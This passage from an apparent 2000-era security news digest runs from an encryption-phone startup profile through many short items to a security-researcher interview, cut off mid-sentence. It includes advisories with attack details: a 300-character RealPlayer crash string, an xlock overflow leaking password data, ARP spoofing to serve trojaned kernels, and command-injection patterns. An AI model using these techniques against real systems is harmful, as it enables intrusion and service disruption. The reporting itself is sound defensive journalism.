MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change the world. Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's gritty, eponymous novel. Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world standard in privacy protection. By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations. Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure phones created by the US National Security Agency. By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses. "Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium. True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium "handsets" to chat securely. And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for surveillance. Its export rules prevent Starium from freely shipping its products overseas. Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed. "The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop progress. You cannot stop technology." Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is considering VoiceSafe as another potential name. Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the handset into the base of the phone. At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end. The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the company says. The final version will operate for over 2 hours on a pair of AA batteries. Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields. "I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says. The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software. Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free. "You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says. The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's now-abandoned Clipper Chip plan to devise a way to talk privately. "I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett Packard and Clarity Software. Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive, and didn't sell very well. The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at Sun Microsystems and co-inventor of public key cryptography. @HWA 163.0 [HNN] Takedown Reviewed ~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by William Knowles The movie 'Takedown', which details the pursuit and capture of Kevin Mitnick and is based on the Markoff book of the same name, is starting to get a little press potentially in anticipation of its US debut. The movie has already been released in France and has received less than stellar reviews. San Francisco Chronicle http://www.sfgate.com/cgi-bin/article.cgi?file Url deceased @HWA 164.0 [HNS] Apr 8:NEW KIND OF SECURITY SCANNER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Saturday 8 April 2000 on 3:33 AM ISS is offering an on-line scanner for Web sites which surveys users' hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge. Link: The Register http://www.theregister.co.uk/000407-000033.html Dead url @HWA 165.0 [HNS] April 8:WAYS TO ATTACK ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Saturday 8 April 2000 on 3:32 AM Following recent high-profile Web security breaches, Enstar, an e-security firm, hosted a live demonstration in San Antonio Friday to show the many ways hackers break into systems. Link: CRN http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID Bad url/server error @HWA 166.0 [HNS] April 7:STOLEN ACCOUNTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 6:50 PM "Malicious hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out. Link: The Straits Times http://www.straitstimes.asia1.com/singapore/sin20_0407.html Dead url @HWA 167.0 [HNS] April 7:JAILED FOR SIX MONTHS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 6:48 PM Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, was jailed for six months yesterday. Link: SCMP http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp Dead url @HWA 168.0 [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 4:27 PM PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. Link: Bugware http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342, PcAnywhere weak password encryption Posted to BugTraq on 7.4.2000 PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, it is prompted for its NT username and password. They are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller. Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT account. All that without even having to go through the L0phtCrack process. Version 7.0 is not at risk since no encryption is used at all. Username and password are sent in clear. I haven't tested version 8 yet. --- Solution --- Symantec says that this was not intended to be real encryption and suggest the use of the Public or Symetric key option instead. More info can be found at : http://service1.symantec.com/SUPPORT/pca.nsf/docid/ 1999022312571812&src=w @HWA 169.0 [HNS] April 7: NET PRIVACY TOOLS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:46 PM Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal. Link: CNET http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head Microsoft plans free Net privacy tools By The Associated Press Special to CNET News.com April 7, 2000, 4:50 a.m. PT TORONTO--Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal. Coming from the world's largest software company, the tools could give impetus for Web sites and other companies to embrace the Platform for Privacy Practices, or P3P. The World Wide Web Consortium, an Internet standards group, may finalize P3P this summer. Richard Purcell, Microsoft's chief privacy officer, said the tools will help consumers better understand how sites track visits and pass along information to other parties. A formal announcement is expected in a few weeks. Purcell disclosed the company's intent during an interview yesterday at the Computers, Freedom and Privacy conference here, meeting through today. People using the Internet are increasingly concerned about Web sites that create profiles of email addresses, favorite books and clothing sizes for marketing purposes. Sites often disclose their intent in privacy statements that are difficult to find and understand. The Microsoft tools, to be released this fall, will translate such statements into machine-readable form and let Internet surfers block access to sites that collect too much. With the software, people using the Web can state what types of information they are willing to give, as well as whether they mind sharing that information with outside parties. Internet surfers will receive a warning before visiting sites that go beyond that level. Microsoft plans to make the tools for its browser, Internet Explorer, and for the competing Netscape browsers. Lorrie Cranor, who heads a P3P Lorrie Cranor, chair of the P3P specification working group at the W3C, discusses the proposed privacy standard. working group, considered Microsoft's decision important, saying, "In order for P3P to be widely used, there has to be good user software available. "The question I always get is, 'Is Microsoft going to implement it?'" she said. Still, critics believe Web sites won't have incentives to join, rendering such tools and standards meaningless. Jason Catlett, president of Junkbusters and a critic of P3P, said wide adoption remains years away. Copyright © 2000 Associated Press. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. @HWA 170.0 [HNS] April 7:SECURITY ADDITIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:45 PM Cisco Systems next week plans to ramp up its VPN security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users. Link: InfoWorld http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml Cisco plans firewall addition for small businesses By Cathleen Moore CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network) security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users. The Cisco PIX Firewall 506 will bring a low-end offering aimed at small businesses and branch offices to the company's existing firewall set. Other products in the family include the PIX 515, targeted at small and midsize enterprises, and the Secure PIX 520, which is designed for large enterprise installations. With its newest firewall member, Cisco is attempting to tap into small business environments, which -- with increasing reliance on the Internet -- are seeking more powerful security solutions for remote access technologies and VPN. About the size of a hardback, the PIX 506 can handle throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB of RAM, and two integrated Fast Ethernet ports. Version 2.0 of Cisco Secure Policy Manager adds improved scalability and additional support for IPsec VPN configurations in Cisco's routers and firewalls. The Policy Manager lets IT managers define and audit network security policies from a central location, according to the company. The product also can simplify deployment of security services supported by Cisco's firewalls and IOS-based VPN routers, Cisco said. The Cisco Secure PIX Firewall 506 will be available in May, priced starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this month, priced at $7,500. Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com. Cathleen Moore is an InfoWorld reporter. @HWA 171.0 [HNS] April 7:COOKIES ~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:43 PM You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Wired has an article about it and we had a discussion on them on our forum. Link: Wired on cookies Link: HNS forum http://www.wired.com/news/politics/0,1283,35498,00.html http://default.net-security.org/phorum/read.php3?num Getting Snooped On? Too Bad by Declan McCullagh 3:00 a.m. Apr. 7, 2000 PDT TORONTO -- You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Well, here's something to make you really nervous: In the United States, it may be illegal to disable software that snoops on you. The folks who came up with this idea turn out to be the large corporations that helped to draft the Digital Millennium Copyright Act (DMCA), which restricts some forms of tampering with copyright protection devices. In some cases, that means you won't be able to turn off any surveillance features it might include, according to participants in a Thursday afternoon panel at the Computers, Freedom and Privacy conference. "Privacy circumvention is possible only under a limited circumstance," said Paul Schwartz of the Brooklyn Law School. As more and more copyrighted material makes its way online, content owners are turning to encryption to protect their works from widespread illicit redistribution. Stephen King distributed his recent novel online in encrypted form, and music companies are backing Secure Digital Memory Card for audio players. Privacy advocates fret that if future works are secure and thus protected under the DMCA, they could reveal consumers' private behavior --RealNetworks' RealJukebox player secretly did just that -- and tinkering with the program to turn off the reporting mechanism would be illegal. "The practical impact is it's another area we're going to be fighting about," Schwartz said. The DMCA, which became law in October 1998, does allow some very limited forms of privacy circumvention. You're allowed to do it if the software leaks "personally identifying information" about you without giving you the ability to say no, and if you're not "in violation of any other law." But here's the rub: Many, if not most, programs include shrink-wrap licenses that prohibit reverse-engineering or altering the program. Some courts have said that shrink-wrap licenses -- software license agreements that don't require a signature -- are binding. If you violate them, would you be able to take advantage of the DMCA's privacy-circumvention loophole? The answer may well be yes. "The statute is basically totally incoherent," says Pam Samuelson, a professor at the University of California at Berkeley and an influential copyright scholar. "We're getting tortured by laws that are inherently incoherent," complained Barry Steinhardt, associate director of the ACLU. Violating the DMCA is a civil offense, and "willfully" violating it for private financial gain is a criminal offense punishable by five years in jail and a $500,000 fine. @HWA 172.0 [HNS] April 7:SECURE E-MAIL SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:39 PM The Royal Mail has launched a secure e-mail service through its secure technology service, ViaCode. Link: Silicon.com http://www.silicon.com/public/door?REQUNIQ @HWA 173.0 [HNS] April 7:ONLINE MUGGERS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Friday 7 April 2000 on 3:38 PM "You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do?" Read Winn Schwartau's article. Link: IDG.net http://www.idg.net/servlet/ContentServlet?global_doc_id Url was eaten by an AOL hax0r or some shit @HWA 174.0 [HNS] April 6:SURVEY BY DTI ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 3:00 PM British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers. That is one of the conclusions published by Department of Trade and Industry. Contributed by Lady Sharrow. Link: The Register http://www.theregister.co.uk/000406-000023.html Dead url @HWA 175.0 [HNS] April 6: COMPUTER CODES PROTECTED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 1:58 PM Computer programs used to scramble electronic messages are protected by the First Amendment because those codes are a means of communication among programmers, a federal appeals court ruled Tuesday. Link: Associated Press http://www.worldnews.com/?action Bad url @HWA 176.0 [HNS] April 6: RELEASED AFTER CODE MACHINE THEFT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 1:57 PM A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine. Link: BBC http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK Man released after code machine theft Bletchley Park: Centre for wartime code-breaking effort A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine. The man, from Bedfordshire, was arrested on Tuesday and released after questioning at Milton Keynes police station. Police have mounted a massive search for the historic machine, which cracked the Nazi Enigma code during the Second World War. It was stolen in broad daylight from a glass cabinet at the Bletchley Park museum on Saturday, where it was on display. Police officers were preparing to trawl a lake on the estate and search the mansion. Thames Valley Police spokesman John Brett said: "A search of the mansion and the grounds of Bletchley Park will start under the supervision of a police search adviser and a team of 10 police officers. The missing Enigma machine "There is a possibility that a Thames Valley Police underwater search unit may be used to search the lake in Bletchley Park. "It could be hidden under the stairs in the mansion, there are lots of places it could be." Detectives think the thief could have abandoned the Enigma machine within the 50-acre grounds of the estate, or in one of the 70 rooms in the mansion. The museum in Milton Keynes, Buckinghamshire, was raided in full view of visitors during an open day on Saturday. The Enigma - one of only three in the world - is worth up to £100,000 and was used by the Germans to encrypt messages sent during the Second World War. Bletchley Park is believed to have shortened the war by cracking the code. Detectives were appealing for any visitors on Saturday who took pictures or video footage to contact police in the hope they might identify the thief. Reward offered Mr Brett urged whoever stole the machine not to be tempted to destroy the evidence in the light of massive publicity. He added: "If it's a prank that's gone wrong, don't destroy it because our main priority is getting it back." A £5,000 reward is being offered by BT, owners of part of the site in Milton Keynes since World War II. "It is a tragedy that the machine has been stolen," Alan White, director of BT's property division, said. @HWA 177.0 [HNS] April 6:CYBERPATROL BLOCK LIST ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Thursday 6 April 2000 on 1:36 PM Our affiliates at Security Watch wrote that a list of thousands of hosts, websites and Usenet groups blocked by Microsystems Software Inc.'s CyberPatrol software has been published on the web. Link: Security Watch http://www.securitywatch.com/scripts/news/list.asp?AID skull fucked url @HWA 178.0 [HNS] April 5:CRYPTO REGULATIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:27 PM Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. Link: Wired http://www.wired.com/news/politics/0,1283,35425,00.html Crypto Regs Challenged Again by Declan McCullagh 4:00 p.m. Apr. 4, 2000 PDT Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. The Sixth Circuit Court of Appeals suggested Monday that President Clinton's restrictions on distributing encryption products might be unconstitutional. "Because computer source code is an expressive means for the exchange of information and ideas about computer programming, we hold that it is protected by the First Amendment," a three-judge panel said in a unanimous 17KB decision. That decision reversed a July 1998 ruling by a federal district court. And while the panel did not strike down the Clinton administration's regulations, it did refer the matter back to U.S. District Judge James Gwin for another hearing. Earlier Gwin had ruled the First Amendment did not apply. The Justice Department says source code is akin to instructions for a machine, and rules governing its distribution are necessary for national security reasons. Now that the appeals court has ruled source code is protected by the First Amendment, the government will have a much tougher time arguing it should have the power to imprison a law professor for posting a book on his website. Peter Junger, a professor at Case Western University School of Law, sued the federal government after it told him he needed a license to post a chapter of his Computers and the Law textbook online. The American Civil Liberties Union, which represents Junger, applauded the ruling. "This is a great day for programmers, computer scientists and all Americans who believe that privacy and intellectual freedom should be free from government control," said ACLU Legal Director Raymond Vasvari. In a separate case that also challenges the criminal penalties the U.S. government imposes for unauthorized encryption distribution, the 9th U.S. Circuit Court of Appeals in May 1999 ruled that encryption source code was speech protected by the First Amendment. "We conclude that the challenged regulations allow the government to restrain speech indefinitely with no clear criteria for review," the 9th Circuit panel said in its decision in a case brought by math professor Daniel Bernstein. But it's not clear what happens next in either the Junger or Bernstein cases. The Clinton administration relaxed the regulations in January, and the move is likely to delay both lawsuits for some time. In fact, the Commerce Department, which administers the regulations, says that Bernstein no longer has anything to worry about. "You ask for an advisory opinion in light of your concern that the new regulations 'continue to interfere with Professor Bernstein's planned scientific activities.' Your concerns are unfounded," a Commerce Department Bureau of Export Administration official wrote to Bernstein's lawyers in February. Bernstein asked in March for a rehearing by the district court to take into account the regulation changes. @HWA 179.0 [HNS] April 5:GFI AND NORMAN TEAM UP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:24 PM GFI and Norman have teamed up to integrate the Norman Virus Engine with GFI's e-mail security gateway, Mail essentials. Link: ESJ http://www.esj.com/breaknewsdisp.asp?ID br0ked url @HWA 180.0 [HNS] April 5:MASTERCARD OFFER VIRUS REPAIR SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 12:23 PM MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package. Link: Computer Currents http://www.currents.net/newstoday/00/04/05/news5.html @HWA 181.0 [HNS] April 5: BUFFER OVERFLOWS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 5 April 2000 on 3:12 AM A survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem. Read new Default article which deals with buffer overflows. Link: Default http://net-security.org/default/articles/09/02.shtml @HWA 182.0 [HNS] April 5: PIRACY ~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 5 April 2000 on 12:11 AM Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers. Link: APB News http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html @HWA 183.0 [HNS] April 5:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 5 April 2000 on 12:05 AM Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has been broken! This was the largest public calculation ever to use a complex parallel algorithm. $5,000 dollars in winnings will be donated to the Free Software Foundation. Link: Slashdot http://slashdot.org/article.pl?sid @HWA 184.0 [HNS]: April 5:GROUP APPEALS DVD CRYPTO INJUNCTION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 5 April 2000 on 12:02 AM Continuing its California courtroom battle against the Digital Video Disk industry over DVD encryption codes, the Electronic Frontier Foundation has appealed an injunction granted against more than 50 Web site operators in January. Link: Computer User http://www.currents.net/newstoday/00/04/04/news7.html @HWA 185.0 [HNS] April 5: VIRUS BLOWS A HOLE IN NATO'S SECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 5 April 2000 on 12:01 AM The North Atlantic Treaty Organization has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net. Link: Computer User http://www.currents.net/newstoday/00/04/04/news3.html @HWA 186.0 [HNS] April 4: FIGHT SPAM WITH SPAM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 4 April 2000 on 8:40 AM Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails. This was taken from booklet 'The Easy Guide to Network Security', which could be downloaded from their UK site. Link: The Register http://www.theregister.co.uk/000404-000001.html @HWA 187.0 [HNS] April 4:REALPLAYER BUFFER OVERFLOW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Tuesday 4 April 2000 on 8:10 AM There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embed in an html page Internet Explorer alos crashes. Link: Bugware 299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embed in an html page Internet Explorer alos crashes. http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,32898, @HWA 188.0 [HNS] May 31st:NO PROBLEMS? ~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 6:46 PM Microsoft says there are no problems with its e-mail software, even as computer experts have come out in support of an Auckland software designer who says its e-mail programs are dangerously flawed. Link: NZ Herald http://www.nzherald.co.nz/storydisplay.cfm?storyID @HWA 189.0 [HNS] May 31:MS SECURITY BULLETIN #38 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 6:41 PM Microsoft has released a patch that eliminates a security vulnerability in Microsoft Windows Media Encoder, which ships as a component of the Windows Media Technologies. The vulnerability could allow a malicious user to interfere with a digital content provider's ability to supply real-time audio and video broadcasts. Link: Read the advisory http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid959791139,28208, @HWA 190.0 [HNS] May 31: BURGLAR ALARM CATCHES ATTACKERS ON THE NET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 31 May 2000 on 5:49 PM The service gives European companies the opportunity to outsource network intrusion detection instead of relying on internal security experts. Defcom showed off its flagship European "alarm centre" in Stockholm Monday -- from which a company's network security can remotely monitored - and said that similar centres are currently being tested in London and Berlin, and will be operational there after the summer. Link: ZDNet UK http://www.zdnet.co.uk/news/2000/21/ns-15659.html @HWA 191.0 [HNS] May 31: SENATE EYES GUARD FOR INFO SECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 31 May 2000 on 5:48 PM The Senate this month urged the Pentagon to study how it might use the Army National Guard to make up for the shortage of computer programmers and information security specialists. Link: IDG http://www.idg.net/ic_184044_1794_9-10000.html @HWA 192.0 [HNS] May 31: TURBOLINUX SECURITY ANNOUNCEMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by LogError Wednesday 31 May 2000 on 5:46 PM Package: xlockmore-4.16 and earlier The xlock program locks an X server until a valid password is entered. The command line option -mode provides a user with a mechanism to change the default display shown when the X server is locked. xlock is installed with privileges to obtain password information, although these are dropped as early as possible. An overflow in the -mode command line option allows a malicious attacker to reveal arbitrary portions of xlock's address space including the shadow password file. Link: Linux Today http://linuxtoday.com/news_story.php3?ltsn @HWA 193.0 [HNS] May 31:NAI ON VBS FIREBURN WORM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:37 PM This is a VBS mass-mailing worm that uses Microsoft Outlook and mIRC to propogate. This worm is a VBS program that is sent to all users in the victim's address book and is attached to an email with varying subject lines, depending on the language version of the host system which sent the message. This worm contains a date activated payload which disables the keyboard and mouse on June 20th. Link: NAI advisory http://vil.nai.com/villib/dispvirus.asp?virus_k @HWA 194.0 [HNS] May 31:INTERNET GUARD DOG PRO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:35 PM Last week McAfee Retail Software, a division of Network Associates, Inc., announced McAfee Internet Guard Dog Pro, an all-in-one solution containing a personal firewall and parental controls to keep children safe while online. Link: Press Release http://net-security.org/cgi-bin/press/fullnews.cgi?newsid959697420,11489, @HWA 195.0 [HNS] May 31: FRANK VAN VLIET INTERVIEW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by BHZ Wednesday 31 May 2000 on 5:34 PM LinuxSecurity.com has an interview with Frank van Vliet aka {}, the author of AuditFile and the man who recently pointed out to configuration errors on apache.org. Link: LinuxSecurity.com http://www.linuxsecurity.com/feature_stories/feature_story-47.html Linux Security Interview with Frank van Vliet By Benjamin D. Thomas 5/30/2000 16:20 Frank van Vliet is the author of AuditFile, many security advisories, and recently pointed out configuration errors on apache.org. We thought our readers would be interested in an interview with Frank van Vliet because of the recent paper he and Peter van Dijk released outlining the steps they took to compromise apache.org. Their paper does not point out any new vulnerabilities, it merely shows how simple configuration errors can leave a system susceptible to attack. In this interview Frank explains how he audits a systems security, major pitfalls administrators fall into, and how he attempts to uncover bugs. We believe that everyone can learn something from this interview. Note: Frank uses the alias {} LinuxSecurity:When and how did you gain interest in security? How did you gain your security knowledge? Frank: When I finally switched from Windows to Linux, I spent a lot of time studying the Linux kernel source. When I finished that one I knew C enough to start coding on my own. I started working on my first security project called Auditfile. A kernel patch making it possible to restrict file access per process or per binary. This enabled me to run my apache webserver only allowing it to read default libraries (/lib/*, /usr/lib/*), read its configuration files, htdocs (wwwroot) directory, and only allowing it to write to logfiles with no further access. At the same time I took over control of the security focused group RooT66 http://root66.nl.eu.org and I joined ShellOracle http://www.shelloracle.org. I spent hours reading various texts and joined Buffer0verfl0w security http://b0f.freebsd.lublin.pl I also got involved with projects like SecNet http://irc.secnet.org (not finished when writing this). I have done some freelance security jobs for small webhosters LinuxSecurity: When attempting to audit a systems security, what procedure do you follow? Where do you begin? How do you normally gather information? What comes next? Frank: My approach changes as I gain more knowledge. Currently when checking the security of a system, I start checking the file system (what files are sundown or suidgroup, what files are accessible for what groups, what files are world writable, are their any files with nonpublic information world readable). Next, I try to find out what processes are running as root. Of course the suid root processes are but there are also crontabs or administrators around running binaries so I wrote some tools live monitoring the processes running as root. When having a list of binaries ran as root, I start checking every binary. Are there any known security flaws in it? Are its configuration files and data files accessible by nonroot? If nothing and I am really in the mood and the binary isn't too big I would download the source of it (I really love open-source) and read it to see if I can find any bugs in it. LinuxSecurity: What are some of the major pitfalls Linux Administrators fall into? Frank: It is never enough to download all patches and updates and run latest versions of your software. The group Buffer0verfl0w Security I am in is constantly searching for new bugs in software. Most admins play with things themselves and forget permissions on files or other configuration faults. These things can be like the following backup script: #!/bin/bash for file in /home/* do tar -czf `echo $file | sed -e 's/\/home\///'`.tar.gz $file mv $file.tar.gz /verysecuredirectory/backups done Which means every home directory will be compressed into targz files in the local directory then they got moved to the /verysecuredirectory/backups. But because most umasks aren't set to make new files 600 and most of the times it makes new files world readable, an attack can gain all directories in /home if it just scans most common directories the root is in for .tar.gz files and very fast copies most of it to his own directories before the scripts move it (most of the time this is while it is still compressing into that tar.gz file and it is already readable. Besides those race condition bugs like the previous ones, there are also administrators that store backups in world readable. And there are always the 'can I trust my network' things. Man in the middle attacks are not very common but are very easy to perform, especially when at the same network segment as the box you attack (could be some other way more insecure box previously hacked). In worst case an attacker on the same segment could broadcast arp who-has packets with the ip of the nameserver the attacked box is using has the MAC address of my NIC. That would mean when the attacked box would try to access the nameserver, it will instead contact the box of the attacker and send its name resolving questions. Then the attack can just reply normally except for the kernel.org domain and have those names resolve to the ip of the box of the attacker. Then have it set up just the same ftpserver as on any other ftp kernel.org box and have it search trojaned Linux kernels and then just wait for a new Linux kernel to be published. LinuxSecurity: Have you exposed any other vulnerabilities, or written any programs related to security? Frank: Well, I wrote auditfile (still working on a newer version, as always) I mentioned in the beginning of this interview that is at http://root66.nl.eu.org/karin/auditfile-1.00.tar.gz. I found a bug and wrote an exploit for bugzilla http://bugzilla.mozilla.org and working on some other exploits and tools at the moment. LinuxSecurity: How do you normally approach finding security vulnerabilities and writing code to exploit them? Frank: Every language has it's own sets of common bugs the programs can have. For C/C++ are mostly buffer overflows. The only way to find them is to check every buffer in the program and search for any functions done on that buffer and check everything if there is a possibility to exploit it. I wrote some perl scripts to automate a part of this task which I normally use to find the buffers, sizes of those buffers and possible insecure functions (like strcpy and sprintf) done on those buffers, saving me a lot of time finding normal overflows. The tricky ones require reading from line 1 to like $ (last line). For perl it are most of the time system or open functions that can be used to execute commands (like system(finger $user) or open($user) where the attacker can set the $user variable). So I normally search for all open, system (system, exec, `, and so on) functions and check arguments to them. Also database functions can be insecure. I know people sending random feeds to their sendmail deamon and catch crashes then backtrace to see what feed caused it and then work there way back from there to the bug. Perhaps someday when I am that desperate to find a bug in some high profile software I would do a thing like that, until then I just read and most of the time you also learn by reading. LinuxSecurity: What do you feel is the most important step in keeping a network secure? Frank: The integrity of the network can be spoiled if only one of the boxes on the network got compromised by a nontrusted person. Most networks get compromised because only one insecure box was on the network. Administrators may want to consider an Intrusion Detection System to monitor all machines on a network. The most important step to keep a network secure is to keep all host secure, this can be done by restricting as much as possible from outside to the network (like only http 